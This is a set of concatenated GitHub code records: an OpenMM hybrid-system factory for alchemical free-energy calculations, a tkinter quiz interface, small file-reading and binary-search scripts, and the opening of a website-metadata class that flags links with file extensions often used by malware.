self._assert_allowable_forces(**kwargs)\n self._copy_box_vectors(**kwargs) # copy box vectors\n self._handle_constraints(**kwargs)\n self._handle_virtual_sites(**kwargs)\n\n self._equip_hybrid_forces(**kwargs)\n\n if self._hybrid_system.usesPeriodicBoundaryConditions():\n self._copy_barostat(**kwargs) # copy barostat\n\n def _add_particles_to_hybrid(self, **unused_kwargs):\n \"\"\"copy all old system particles to hybrid with identity mapping\"\"\"\n self._old_to_hybrid_map = {}\n self._new_to_hybrid_map = {}\n\n old_num_particles = self._old_system.getNumParticles()\n new_num_particles = self._new_system.getNumParticles()\n for idx in range(old_num_particles): # iterate over old particles\n mass_old = self._old_system.getParticleMass(idx)\n if idx in self._old_to_new_atom_map.keys():\n idx_in_new_sys = self._old_to_new_atom_map[idx]\n mass_new = self._new_system.getParticleMass(idx_in_new_sys)\n mix_mass = (mass_old + mass_new) / 2\n else:\n mix_mass = mass_old\n hybrid_idx = self._hybrid_system.addParticle(mix_mass)\n self._old_to_hybrid_map[idx] = hybrid_idx\n\n # make assertion on old particles map equivalence\n assert {key==val for key, val in self._old_to_hybrid_map.items()}, f\"\"\"\n old particle to hybrid particle map is not equivalent\"\"\"\n\n # make assertion on old particles\n assert len(self._old_to_hybrid_map) == old_num_particles, f\"\"\"\n there is a convention mistake; the `self._old_to_hybrid_map`\n has {len(self._old_to_hybrid_map)} particles, but the old\n system has {old_num_particles} particles\"\"\"\n\n # make the `hybrid_to_old_map`\n self._hybrid_to_old_map = {value: key for key, value in\n self._old_to_hybrid_map.items()}\n\n # make `self._hybrid_to_new_map`;\n # first, since all of the old indices are equiv to hybrid indices...\n self._hybrid_to_new_map = copy.deepcopy(self._old_to_new_atom_map)\n\n for idx in self._unique_new_atoms: # iterate over new particles\n mass = self._new_system.getParticleMass(idx)\n hybrid_idx = self._hybrid_system.addParticle(mass)\n self._hybrid_to_new_map[hybrid_idx] = idx\n\n # make assertion on new particles\n new_num_particles = self._new_system.getNumParticles()\n assert len(self._hybrid_to_new_map) == new_num_particles, f\"\"\"\n there is a convention mistake; the `self._new_to_hybrid_map`\n has {len(self._hybrid_to_new_map)} particles, but the new\n system has {new_num_particles} particles\"\"\"\n\n # make the `new_to_hybrid_map`\n self._new_to_hybrid_map = {value: key for key, value in\n self._hybrid_to_new_map.items()}\n\n def _get_force_dicts(self, **unused_kwargs):\n \"\"\"make a dict of force for each system and set attrs\"\"\"\n for key, sys in zip(['_old_forces', '_new_forces'],\n [self._old_system, self._new_system]):\n setattr(self,\n key,\n {force.__class__.__name__: force for force in sys.getForces()}\n )\n\n def _assert_allowable_forces(self, **unused_kwargs):\n \"\"\"this method ensures that the two systems are effectively identical\n at the `System` level; importantly, we assert that:\n 1. the number/name of forces in each system is identical\n 2. the force name in each system is in the 'allowed_forcenames'\n \"\"\"\n # make sure that each force in each system is allowed\n for force_dict in [self._old_forces, self._new_forces]:\n try:\n for force_name in force_dict.keys():\n assert force_name in self._allowed_force_names\n except Exception as e:\n raise NameError(f\"\"\"\n In querying force dict, assertion failed with {e}\n \"\"\")\n\n def _handle_constraints(self, **unused_kwargs):\n \"\"\"copy constraints; check to make sure it doesn't change\"\"\"\n constraint_lengths = {}\n for system_name in ['old', 'new']:\n sys = getattr(self, f\"_{system_name}_system\")\n hybrid_map = getattr(self, f\"_{system_name}_to_hybrid_map\")\n for constraint_idx in range(sys.getNumConstraints()):\n a1, a2, length = sys.getConstraintParameters(constraint_idx)\n hybr_atoms = tuple(sorted([hybrid_map[a1], hybrid_map[a2]]))\n if hybr_atoms not in constraint_lengths.keys():\n self._hybrid_system.addConstraint(*hybr_atoms, length)\n constraint_lengths[hybr_atoms] = length\n else:\n if constraint_lengths[hybr_atoms] != length:\n raise Exception(f\"\"\"\n Constraint length is changing for atoms {hybr_atoms}\n in hybrid system: old is\n {constraint_lengths[hybr_atoms]} and new is\n {length}\n \"\"\")\n\n def _copy_box_vectors(self, **unused_kwargs):\n box_vectors = self._old_system.getDefaultPeriodicBoxVectors()\n self._hybrid_system.setDefaultPeriodicBoxVectors(*box_vectors)\n\n def _copy_barostat(self, **unused_kwargs):\n if \"MonteCarloBarostat\" in self._old_forces.keys():\n barostat = copy.deepcopy(self._old_forces[\"MonteCarloBarostat\"])\n self._hybrid_system.addForce(barostat)\n\n def _handle_virtual_sites(self, **unused_kwargs):\n \"\"\"for now, assert that none of the particle are virtual sites\"\"\"\n for system_name in ['old', 'new']:\n sys = getattr(self, f\"_{system_name}_system\")\n num_ps = sys.getNumParticles()\n for idx in range(num_ps):\n if sys.isVirtualSite(idx):\n raise Exception(f\"\"\"\n system {system_name} particle {idx} is a virtual site\n but virtual sites are not currently supported.\n \"\"\")\n\n def _equip_hybrid_forces(self, **kwargs):\n pass\n\n @property\n def hybrid_system(self):\n return copy.deepcopy(self._hybrid_system)\n\nclass V1SingleTopologyHybridSystemFactory(\n BaseSingleTopologyHybridSystemFactory):\n ATM_EXPR_TEMPLATE = [\n 'U0 + (({atm_lambda2} - {atm_lambda1})/{atm_alpha}) * log_term + {atm_lambda2}*u_sc + {atm_w0};',\n 'log_term = c + log(exp(-c) + exp(exponand-c));',\n 'c = max(0, exponand);',\n 'exponand = -{atm_alpha}*(u_sc - {atm_u0});',\n 'u_sc = select(soften_bool, u_soft, u);',\n 'soften_bool = select(1-{atm_soften_switch}, 0, step(u - {atm_u_cut}));',\n 'u_soft = ({atm_u_max} - {atm_u_cut}) * f_sc + {atm_u_cut};',\n 'f_sc = (z_y^{atm_a} - 1)/(z_y^{atm_a} + 1);',\n 'z_y = 1 + 2*y_by_a + 2*(y_by_a^2);',\n 'y_by_a = y / {atm_a};',\n 'y = (u - {atm_u_cut}) / ({atm_u_max} - {atm_u_cut});',\n 'u = U1 - U0;',\n 'U1 = select({atm_leg}, U0_static, U1_static);',\n 'U0 = select({atm_leg}, U1_static, U0_static);']\n\n ATM_EXPR = ''.join(ATM_EXPR_TEMPLATE)\n ATM_COLLECTIVE_VARS = ['U0_static', 'U1_static']\n ATM_GLOBAL_PARAMS = {\n 'atm_time': 0.,\n 'atm_lambda1': 0.,\n 'atm_lambda2': 0.,\n 'atm_alpha': 0.1,\n 'atm_u_cut': 200., # check this again in comparison to `_u0`\n 'atm_u0': 100.,\n 'atm_u_max': 400.,\n 'atm_a': 0.0625,\n 'atm_w0': 0.,\n 'atm_soften_switch': 1., # bool to determine whether to allow for soft u_sc,\n 'atm_leg': 0.,\n }\n\n VALENCE_EXPR_TEMPLATE = [\n \"U0_static = old_term + static_term + unique_term;\",\n \"U1_static = new_term + static_term + unique_term;\",\n \"unique_term = unique_old_switch*unique_old_term + unique_new_switch*unique_new_term;\"\n \"old_term = select(1-old, 0., U_valence);\",\n \"new_term = select(1-new, 0., U_valence);\",\n \"unique_old_term = select(1-uold, 0., U_valence);\",\n \"unique_new_term = select(1-unew, 0., U_valence);\"\n \"static_term = select(1-static, 0., U_valence);\"]\n\n VALENCE_EXPR = ' '.join(VALENCE_EXPR_TEMPLATE)\n VALENCE_GLOBAL_PARAMETERS = {'unique_old_switch': 1,\n 'unique_new_switch': 1}\n VALENCE_FORCE_UTILS = {\n 'HarmonicBondForce': {\n 'addTerm': 'addBond',\n 'setTerm': 'setBondParameters',\n 'query_num_terms': 'getNumBonds',\n 'query_params': 'getBondParameters',\n 'custom_force': openmm.CustomBondForce,\n 'num_particles': 2,\n 'add_per_term_param': 'addPerBondParameter',\n 'num_params': 2,\n 'per_term_params': ['length', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n 'U_valence': \"U_valence = 0.5*k*(r-length)^2;\"},\n 'HarmonicAngleForce': {\n 'addTerm': 'addAngle',\n 'setTerm': 'setAngleParameters',\n 'query_num_terms': 'getNumAngles',\n 'query_params': 'getAngleParameters',\n 'custom_force': openmm.CustomAngleForce,\n 'num_particles': 3,\n 'add_per_term_param': 'addPerAngleParameter',\n 'num_params': 2,\n 'per_term_params': ['angle', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n \"U_valence\": \"U_valence = 0.5*k*(theta-angle)^2;\"},\n 'PeriodicTorsionForce': {\n 'addTerm': 'addTorsion',\n 'setTerm': 'setTorsionParameters',\n 'query_num_terms': 'getNumTorsions',\n 'query_params': 'getTorsionParameters',\n 'custom_force': openmm.CustomTorsionForce,\n 'num_particles': 4,\n 'add_per_term_param': 'addPerTorsionParameter',\n 'num_parameters': 3,\n 'per_term_params': ['periodicity', 'phase', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n \"U_valence\": \"U_valence = k*(1 + cos(periodicity*theta - phase));\"}\n }\n\n NONBONDED_GLOBAL_PARAMETERS = {'unique_old_exception_switch': 1.,\n 'unique_new_exception_switch': 1.,\n 'exception_offset' : 0.,\n 'particle_offset': 0.}\n def __init__(self,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _default_protocol(self, time, parameters) -> Dict[str, float]:\n \"\"\"from a set of parameters, given the time, update them accordingly;\n `time` runs from 0 to 1\"\"\"\n lambda1 = time if time < 0.5 else 1. - time\n lambda2 = lambda1\n leg = 0 if time < 0.5 else 1\n updater = {\n 'atm_time': time,\n 'atm_lambda1': lambda1,\n 'atm_lambda2': lambda2,\n 'atm_leg': leg,\n }\n parameters.update(updater)\n return parameters\n\n\n def _equip_hybrid_forces(self, **kwargs):\n \"\"\"\n equip the valence and nonbonded forces.\n \"\"\"\n # manage the global params/custom expr first\n atm_global_param_format = {key: key for key in self.ATM_GLOBAL_PARAMS.keys()}\n atm_base_expression = copy.deepcopy(self.ATM_EXPR).format(**atm_global_param_format)\n\n # get the set of union forcenames\n joint_forcenames = set(list(self._old_forces.keys()) + list(self._new_forces.keys()))\n\n valence_custom_expr = atm_base_expression + self.VALENCE_EXPR\n valence_forcenames = list(self.VALENCE_FORCE_UTILS.keys())\n valence_global_params = copy.deepcopy(self.ATM_GLOBAL_PARAMS)\n valence_global_params.update(self.VALENCE_GLOBAL_PARAMETERS)\n for forcename in joint_forcenames:\n # warning, this will fail if the valence force is not in both systems.\n if forcename in valence_forcenames: # if it is valence\n old_force = self._old_forces[forcename]\n new_force = self._new_forces[forcename]\n out_force = translate_standard_valence_force_to_custom(\n old_force = old_force,\n new_force = new_force,\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n force_utils = self.VALENCE_FORCE_UTILS[forcename],\n custom_expression = valence_custom_expr,\n global_parameters = valence_global_params,\n static_del = [1, 0, 0, 0, 0],\n old_del = [0, 1, 0, 0, 0],\n new_del = [0, 0, 1, 0, 0],\n unique_old_del = [0, 0, 0, 1, 0],\n unique_new_del = [0, 0, 0, 0, 1], **kwargs)\n _ = self._hybrid_system.addForce(out_force)\n\n # now nonbonded\n if 'NonbondedForce' in joint_forcenames:\n nonbonded_global_param_names = {key: key for\n key in self.NONBONDED_GLOBAL_PARAMETERS.keys()}\n u0_nb, u1_nb = translate_standard_nonbonded_force(\n old_nbf=self._old_forces['NonbondedForce'],\n new_nbf=self._new_forces['NonbondedForce'],\n num_hybrid_particles = self._hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n **nonbonded_global_param_names)\n cv = openmm.CustomCVForce(atm_base_expression)\n for coll_var_name, coll_var in zip(self.ATM_COLLECTIVE_VARS, [u0_nb, u1_nb]):\n cv.addCollectiveVariable(coll_var_name, copy.deepcopy(coll_var))\n for param_name, param_value in self.ATM_GLOBAL_PARAMS.items():\n cv.addGlobalParameter(param_name, param_value)\n _ = self._hybrid_system.addForce(cv)\n\n def test_energy_endstates(self, old_positions, new_positions,\n atol=1e-1, rtol=1e-6, verbose=False,\n context_args = (), **unused_kwargs):\n hybrid_system = self.hybrid_system # get the hybrid system\n\n # make match querier dict.\n std_to_custom_forcename = {key: _dict['custom_force']('').__class__.__name__\n for key, _dict in self.VALENCE_FORCE_UTILS.items()}\n std_to_custom_forcename['NonbondedForce'] = 'CustomCVForce' # handle nonbonded\n std_to_custom_forcename['MonteCarloBarostat'] = 'MonteCarloBarostat'\n\n # get positions.\n hybrid_positions = get_hybrid_positions(old_positions=old_positions,\n new_positions = new_positions, num_hybrid_particles=hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map, new_to_hybrid_map = self._new_to_hybrid_map)\n old_positions = get_original_positions_from_hybrid(hybrid_positions = hybrid_positions,\n hybrid_to_original_map = self._hybrid_to_old_map)\n new_positions = get_original_positions_from_hybrid(hybrid_positions = hybrid_positions,\n hybrid_to_original_map = self._hybrid_to_new_map)\n\n # first, retrieve the old/new system forces by object\n if verbose: print(f\"computing old force energies.\")\n old_force_dict = energy_by_force(system = copy.deepcopy(self._old_system),\n reference_positions = old_positions, context_args = context_args)\n if verbose: print(f\"computing new force energies\")\n new_force_dict = energy_by_force(system = copy.deepcopy(self._new_system),\n reference_positions = new_positions, context_args = context_args)\n\n # now set the valence global parameters to match old\n zero_atm_global_params = {'atm_time': 0.,\n 'atm_leg': 0.,\n 'unique_old_switch': 1.,\n 'unique_new_switch': 0.,\n 'U0_static_unique_old_exception_switch': 1.,\n 'U0_static_unique_new_exception_switch': 0.,\n 'U1_static_unique_old_exception_switch': 1.,\n 'U1_static_unique_new_exception_switch': 0.}\n switch_lambda = lambda x: 1. if x==0. else 0.\n one_atm_global_params = {key: switch_lambda(val) for key, val in zero_atm_global_params.items()}\n if verbose: print(f\"computing old hybrid force energies...\")\n hybr_old_force_dict = energy_by_force(system = self.hybrid_system,\n reference_positions = hybrid_positions, global_parameters=zero_atm_global_params,\n context_args = context_args)\n if verbose: print(f\"computing new hybrid force energies...\")\n hybr_new_force_dict = energy_by_force(system = copy.deepcopy(self.hybrid_system),\n reference_positions = hybrid_positions, global_parameters=one_atm_global_params,\n context_args = context_args)\n\n original_joint_forcenames = set(list(self._old_forces.keys())).union(\n set(list(self._new_forces.keys())))\n\n for original_forcename in original_joint_forcenames:\n custom_forcename = std_to_custom_forcename[original_forcename]\n old_energy = old_force_dict[original_forcename]\n new_energy = new_force_dict[original_forcename]\n if original_forcename == 'MonteCarloBarostat':\n if verbose: print(f\"omitting `MonteCarloBarostat`\")\n else:\n hybrid_old_energy = hybr_old_force_dict[custom_forcename]\n hybrid_new_energy = hybr_new_force_dict[custom_forcename]\n for endstate, orig_e, hybr_e in zip(['old', 'new'],\n [old_energy, new_energy], [hybrid_old_energy, hybrid_new_energy]):\n if not np.isclose(orig_e, hybr_e, atol=atol, rtol=rtol):\n raise Exception(f\"\"\"for original force {original_forcename}\n (custom force {custom_forcename}) at {endstate} state,\n energies do not match: {orig_e} vs {hybr_e}, respectively.\n \"\"\")\n elif verbose:\n print(f\"\"\"original force {original_forcename} with energy {orig_e}\n at state {endstate} match. ({orig_e} and {hybr_e}, respectively)\"\"\")\n else:\n pass\n\nclass SCRFSingleTopologyHybridSystemFactory(BaseSingleTopologyHybridSystemFactory):\n \"\"\"\n SoftCore ReactionField Single Topology HybridSystemFactory;\n WARNING: this operation can expect to take ~15s in complex phase.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _default_protocol(self, time, parameters, **unused_kwargs) -> Dict[str, float]:\n updater = {'lambda_global': time}\n parameters.update(updater)\n return parameters\n\n def _make_rf_systems(self, **kwargs):\n \"\"\"internal utility to make reaction-field systems\n for energy matching comparisons and reference\"\"\"\n from aludel.rf import ReactionFieldConverter\n self._old_rf_system = ReactionFieldConverter(self._old_system, **kwargs).rf_system\n self._new_rf_system = ReactionFieldConverter(self._new_system, **kwargs).rf_system\n\n def _get_valence_converter(self, **unused_kwargs):\n \"\"\"get the valence converter factory\"\"\"\n from aludel.valence import SingleTopologyHybridValenceConverter\n return SingleTopologyHybridValenceConverter\n\n def _get_nonbonded_converter(self, **unused_kwargs):\n from aludel.rf import SingleTopologyHybridNBFReactionFieldConverter\n return SingleTopologyHybridNBFReactionFieldConverter\n\n def _equip_hybrid_forces(self, **kwargs):\n \"\"\"\n equip the valence and nonbonded forces\n \"\"\"\n valence_converter = self._get_valence_converter(**kwargs)\n nonbonded_converter = self._get_nonbonded_converter(**kwargs)\n # get the set of union forcenames\n joint_forcenames = set(list(self._old_forces.keys()) + list(self._new_forces.keys()))\n valence_forcenames = [i for i in self._allowed_force_names if i not in ['NonbondedForce',\n 'MonteCarloBarostat']]\n for forcename in joint_forcenames:\n if forcename in valence_forcenames: # if it is valence\n # this will fail if the valence force is not in both systems\n old_force = self._old_forces[forcename]\n new_force = self._new_forces[forcename]\n valence_hbf_factory = valence_converter(\n old_force = self._old_forces[forcename],\n new_force = self._new_forces[forcename],\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n num_hybrid_particles = self._hybrid_system.getNumParticles(),\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n **kwargs)\n out_force = valence_hbf_factory.hybrid_force\n self._hybrid_system.addForce(out_force)\n\n if 'NonbondedForce' in joint_forcenames:\n nb_converter_factory = nonbonded_converter(\n old_nbf=self._old_forces['NonbondedForce'],\n new_nbf=self._new_forces['NonbondedForce'],\n old_to_hybrid_map=self._old_to_hybrid_map,\n new_to_hybrid_map=self._new_to_hybrid_map,\n num_hybrid_particles=self._hybrid_system.getNumParticles(),\n unique_old_atoms=self._unique_old_atoms,\n unique_new_atoms=self._unique_new_atoms,\n **kwargs)\n hybrid_rf_nbfs = nb_converter_factory.rf_forces\n _ = [self._hybrid_system.addForce(_q) for _q in hybrid_rf_nbfs]\n\n def test_energy_endstates(self, old_positions, new_positions, atol=1e-2,\n rtol=1e-6, verbose=False, context_args=(),\n old_global_parameters = {'lambda_global': 0., 'retain_exception_switch': 0., 'retain_uniques': 0.},\n new_global_parameters = {'lambda_global': 1., 'retain_exception_switch': 0., 'retain_uniques': 0.},\n return_energy_differences=False, **kwargs):\n \"\"\"test the endstates energy bookkeeping here;\n WARNING: for complex phase, this is an expensive operation (~30s on CPU).\n \"\"\"\n from aludel.atm import (energy_by_force,\n get_hybrid_positions, get_original_positions_from_hybrid)\n from aludel.rf import ReactionFieldConverter\n\n if verbose: print(f\"generating old rf system...\")\n old_rf_system = ReactionFieldConverter(self._old_system, **kwargs).rf_system\n if verbose: print(f\"generating new rf system...\")\n new_rf_system = ReactionFieldConverter(self._new_system, **kwargs).rf_system\n\n hybrid_system = self.hybrid_system\n hybrid_positions = get_hybrid_positions(old_positions=old_positions,\n new_positions=new_positions, num_hybrid_particles=self._hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map, new_to_hybrid_map = self._new_to_hybrid_map,\n **kwargs)\n old_positions = get_original_positions_from_hybrid(hybrid_positions=hybrid_positions,\n hybrid_to_original_map=self._hybrid_to_old_map, **kwargs)\n new_positions = get_original_positions_from_hybrid(hybrid_positions=hybrid_positions,\n hybrid_to_original_map=self._hybrid_to_new_map, **kwargs)\n\n # first, retrieve the old/new system forces by object\n if verbose: print(f\"computing old force energies.\")\n old_es = energy_by_force(system = copy.deepcopy(old_rf_system),\n reference_positions = old_positions, context_args = context_args)\n if verbose: print(f\"computing new force energies\")\n new_es = energy_by_force(system = copy.deepcopy(new_rf_system),\n reference_positions = new_positions, context_args = context_args)\n\n if verbose: print(f\"computing old hybrid force energies...\")\n hybr_old_es = energy_by_force(system = self.hybrid_system,\n reference_positions = hybrid_positions, global_parameters=old_global_parameters,\n context_args = context_args)\n if verbose: print(f\"computing new hybrid force energies...\")\n hybr_new_es = energy_by_force(system = copy.deepcopy(self.hybrid_system),\n reference_positions = hybrid_positions, global_parameters=new_global_parameters,\n context_args = context_args)\n\n # old match\n old_es_sum = np.sum(list(old_es.values()))\n hybr_old_es_sum = np.sum(list(hybr_old_es.values()))\n old_pass = np.isclose(old_es_sum, hybr_old_es_sum,\n atol=atol, rtol=rtol)\n if not old_pass:\n print(f\"\"\"energy match of old/hybrid-old system failed; printing energy by forces...\\n\n \\t{old_es_sum}\\n\\t{hybr_old_es_sum}\"\"\")\n else:\n print(f\"passed with energy match: {old_es_sum, hybr_old_es_sum}\")\n\n # new match\n new_es_sum = np.sum(list(new_es.values()))\n hybr_new_es_sum = np.sum(list(hybr_new_es.values()))\n new_pass = np.isclose(new_es_sum, hybr_new_es_sum,\n atol=atol, rtol=rtol)\n if not new_pass:\n print(f\"\"\"energy match of new/hybrid-new system failed; printing energy by forces...\\n\n \\t{new_es_sum}\\n\\t{hybr_new_es_sum}\"\"\")\n else:\n print(f\"passed with energy match: {new_es_sum, hybr_new_es_sum}\")\n\n if verbose:\n for nonalch_state, alch_state, state_name in zip(\n [old_es, new_es], [hybr_old_es, hybr_new_es], ['old', 'new']):\n print(f\"\"\"printing {state_name} nonalch and alch energies by force:\"\"\")\n for _force, _energy in nonalch_state.items():\n print(f\"\\t\", _force.__class__.__name__, _energy)\n print(\"\\n\")\n for _force, _energy in alch_state.items():\n print(f\"\\t\", _force.__class__.__name__, _energy)\n\n if return_energy_differences:\n return [[old_es_sum, hybr_old_es_sum], [new_es_sum, hybr_new_es_sum]]\n else:\n if not old_pass: raise Exception(f\"old failed\")\n if not new_pass: raise Exception(f\"new failed\")\n\nclass ThetaIntegratorSCRFSingleTopologyHybridSystemFactory(\n SCRFSingleTopologyHybridSystemFactory):\n \"\"\"convert a hybrid system controlled by `softcore_alpha` to a hybrid system controlled by `theta_global`\"\"\"\n def __init__(self, *args, **kwargs):\n # define `softcore_alpha_str`, `default_theta_global`, `theta_global_energy_str`\n super().__init__(*args, **kwargs)\n\n def _get_nonbonded_converter(self, **unused_kwargs):\n from aludel.rf import ThetaIntegratorSingleTopologyHybridNBFReactionFieldConverter\n return ThetaIntegratorSingleTopologyHybridNBFReactionFieldConverter\n","repo_name":"dominicrufa/aludel","sub_path":"aludel/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":45518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"39356618643","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizzlerInterface:\n\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"Quizzler\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n self.score = Label(text=\"score: 0\", bg=THEME_COLOR, fg=\"white\", font=(\"Arial\", 16))\n self.score.grid(row=0, column=1)\n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.quiz_text = self.canvas.create_text(150,\n 125,\n text=\"quiz here...\",\n fill=THEME_COLOR,\n width=250,\n font=(\"Arial\", 16, \"italic\"))\n self.canvas.grid(row=1, column=0, columnspan=2, pady=50)\n self.trueImg = PhotoImage(file=\"images/true.png\")\n self.trueBtn = Button(image=self.trueImg, highlightthickness=0, command=self.pressedTrue)\n self.trueBtn.grid(row=2, column=0)\n\n self.falseImg = PhotoImage(file=\"images/false.png\")\n self.falseBtn = Button(image=self.falseImg, highlightthickness=0, command=self.pressedFalse)\n self.falseBtn.grid(row=2, column=1)\n self.get_next_quiz()\n\n self.window.mainloop()\n\n def get_next_quiz(self):\n self.canvas.config(bg=\"white\")\n if self.quiz.still_has_questions():\n self.score.config(text=f\"score: {self.quiz.score}\")\n q_text = self.quiz.next_question()\n self.canvas.itemconfig(self.quiz_text, text=q_text)\n else:\n self.canvas.itemconfig(self.quiz_text, text=\"You have done the quiz game!\")\n self.trueBtn.config(state=\"disabled\")\n self.falseBtn.config(state=\"disabled\")\n\n def pressedTrue(self):\n is_right = self.quiz.check_answer(\"True\")\n self.give_feedback(is_right)\n\n def pressedFalse(self):\n is_right = self.quiz.check_answer(\"False\")\n self.give_feedback(is_right)\n\n def give_feedback(self, is_right):\n if is_right:\n self.canvas.config(bg=\"green\")\n else:\n self.canvas.config(bg=\"red\")\n self.window.after(1000, self.get_next_quiz)\n","repo_name":"KoshCocna/25_quizzler","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2740596795","text":"#!/usr/bin/python3\n\"\"\"\n 2-read_lines\n\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\" reads n lines of a text file\"\"\"\n line_num = 0\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n if line_num < nb_lines or not nb_lines or nb_lines < 0:\n print(line, end=\"\")\n line_num += 1\n","repo_name":"jashjchoi/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74911831768","text":"numberlist = [3,5,6,7,9,12,15,18,23,24,26,38,59,64,83]\r\nnumber_to_find = 15\r\ndef binnary_search(number_list, number_to_find):\r\n left_index = 0\r\n right_index = len(number_list)-1\r\n mid_index = 0\r\n\r\n while left_index <= right_index:\r\n mid_index = (left_index+right_index)//2\r\n mid_number = number_list[mid_index]\r\n\r\n if mid_number == number_to_find:\r\n return mid_index\r\n\r\n if mid_number < number_to_find:\r\n left_index = mid_index+1\r\n\r\n else:\r\n right_index = mid_index-1\r\n\r\n return -1\r\n\r\nprint(f'index of the number is: {binnary_search(numberlist, number_to_find)}')\r\n\r\n","repo_name":"kartikey1998/Algorithms","sub_path":"Binary search/binary search.py","file_name":"binary search.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2188611569","text":"from features.metadata_base import MetadataBase\nfrom features.website_manager import WebsiteData\nfrom lib.constants import VALUES\n\n\nclass MaliciousExtensions(MetadataBase):\n # Based on: https://www.file-extensions.org/filetype/extension/name/dangerous-malicious-files\n # https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows/\n # https://sensorstechforum.com/file-types-used-malware-2019/\n # https://www.howtogeek.com/127154/how-hackers-can-disguise-malicious-programs-with-fake-file-extensions/\n malicious_extensions = [\n \"msp\",\n \"cfxxe\",\n \"php3\",\n \"vb\",\n \"swf\",\n \"mcq\",\n \"dyv\",\n \"html\",\n \"ps1\",\n \"9\",\n \"ocx\",\n \"chm\",\n \"mshxml\",\n \"lkh\",\n \"hlp\",\n \"iws\",\n \"gadget\",\n \"pr\",\n \"wlpginstall\",\n \"kcd\",\n \"docx\",\n \"dom\",\n \"hsq\",\n \"aepl\",\n \"0_full_0_tgod_signed\",\n \"dyz\",\n \"psc1\",\n \"py\",\n \"cyw\",\n \"blf\",\n \"osa\",\n \"pdf\",\n \"shs\",\n \"xlm\",\n \"exe_renamed\",\n \"exe1\",\n \"pif\",\n \"xir\",\n \"vbs\",\n \"qrn\",\n \"mjg\",\n \"fag\",\n \"xdu\",\n \"xlam\",\n \"com\",\n \"ps2xml\",\n \"reg\",\n \"cpl\",\n \"plc\",\n \"ska\",\n \"xlv\",\n \"bmw\",\n \"msc\",\n \"tko\",\n \"rna\",\n \"msh2xml\",\n \"wmf\",\n \"hlw\",\n \"uzy\",\n \"nls\",\n \"inf\",\n \"iva\",\n \"zix\",\n \"gzquar\",\n \"cxq\",\n \"ppam\",\n \"bps\",\n \"ppt\",\n \"dxz\",\n \"ezt\",\n \"jse\",\n \"xnxx\",\n \"xls\",\n \"aru\",\n \"lok\",\n \"hta\",\n \"vba\",\n \"xltm\",\n \"atm\",\n \"xtbl\",\n \"txs\",\n \"xlsm\",\n \"mjz\",\n \"mfu\",\n \"wsf\",\n \"cih\",\n \"xnt\",\n \"capxml\",\n \"sfx\",\n \"fjl\",\n \"cmd\",\n \"msh\",\n \"aut\",\n \"ws\",\n \"tti\",\n \"dlb\",\n \"msh1\",\n \"ozd\",\n \"fuj\",\n \"exe\",\n \"class\",\n \"386\",\n \"qit\",\n \"ps2\",\n \"delf\",\n \"cla\",\n \"ps1xml\",\n \"bkd\",\n \"bin\",\n \"dev\",\n \"cc\",\n \"sys\",\n \"dx\",\n \"vbx\",\n \"bup\",\n \"vxd\",\n \"rsc_tmp\",\n \"spam\",\n \"tps\",\n \"htm\",\n \"wsh\",\n \"bll\",\n \"sop\",\n \"wsc\",\n \"bxz\",\n \"jar\",\n \"tsa\",\n \"msi\",\n \"pcx\",\n \"vbe\",\n \"smm\",\n \"rhk\",\n \"dli\",\n \"application\",\n \"let\",\n \"pid\",\n \"upa\",\n \"msh1xml\",\n \"ce0\",\n \"psc2\",\n \"msh2\",\n \"lpaq5\",\n \"ctbl\",\n \"boo\",\n \"js\",\n \"buk\",\n \"hts\",\n \"sldm\",\n \"bat\",\n \"smtmp\",\n \"dllx\",\n \"ppsm\",\n \"docm\",\n \"bhx\",\n \"scf\",\n \"fnr\",\n \"pptm\",\n \"drv\",\n \"doc\",\n \"vzr\",\n \"ssy\",\n \"scr\",\n \"dotm\",\n \"s7p\",\n \"ceo\",\n \"tmp\",\n \"lik\",\n \"lnk\",\n \"pgm\",\n \"dll\",\n \"oar\",\n \"bqf\",\n \"zvz\",\n \"dbd\",\n \"vexe\",\n \"potm\",\n \"\\u202e\",\n ]\n decision_threshold = 0\n\n def _start(self, website_data: WebsiteData) -> dict:\n malicious_extensions = [\n extension\n for extension in website_data.extensions\n if extension.replace(\".\", \"\") in self.malicious_extensions\n ]\n return {VALUES: 